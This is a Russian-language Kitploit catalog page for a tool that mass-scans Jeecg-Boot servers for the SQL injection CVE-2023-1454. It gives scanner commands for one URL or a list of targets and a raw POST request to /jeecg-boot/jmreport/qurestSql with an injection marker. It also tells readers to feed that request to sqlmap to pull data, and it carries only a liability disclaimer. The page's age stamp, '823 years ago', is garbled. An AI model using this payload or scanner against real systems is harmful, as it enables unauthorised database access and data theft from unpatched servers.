Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-1454 — CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测 | Kitploit
Инструменты/GitHubGitHub/padbergpete47/cve-2023-1454
Vulnerability ScannersExploitationWeb Application ExploitationPenetration Testing
GitHubpadbergpete47/cve-2023-1454

CVE-2023-1454

CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测

Репозиторий
823 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-1454

jmreport/qurestSql неавторизованное массовое сканирование SQL-инъекций poc Jeecg-Boot — это быстрая платформа разработки на основе Spring Boot и Jeecg-Boot-Plus. В последней версии jeecg-boot 3.5.0 были обнаружены множественные уязвимости SQL-инъекций.

Описание

Оригинальный инструмент

Оригинальный инструмент имел высокую частоту ложных срабатываний, поэтому были изменены условия проверки и попутно оптимизирован код.

Использование инструмента

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 тест одного URL

python3 CVE-2023-1454-scan.py -f url.txt массовое сканирование

После завершения сканирования в текущей директории будет создан файл vuln.txt с URL-адресами, содержащими уязвимости.

poc:

exp:

Сохраните пакет данных в формате txt, затем с помощью sqlmap можно получить данные.

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

Отказ от ответственности

Любые прямые или косвенные последствия и убытки, возникшие в результате распространения или использования информации, предоставленной в данном документе, несет сам пользователь. Автор не несет за это никакой ответственности.

Скачать инструмент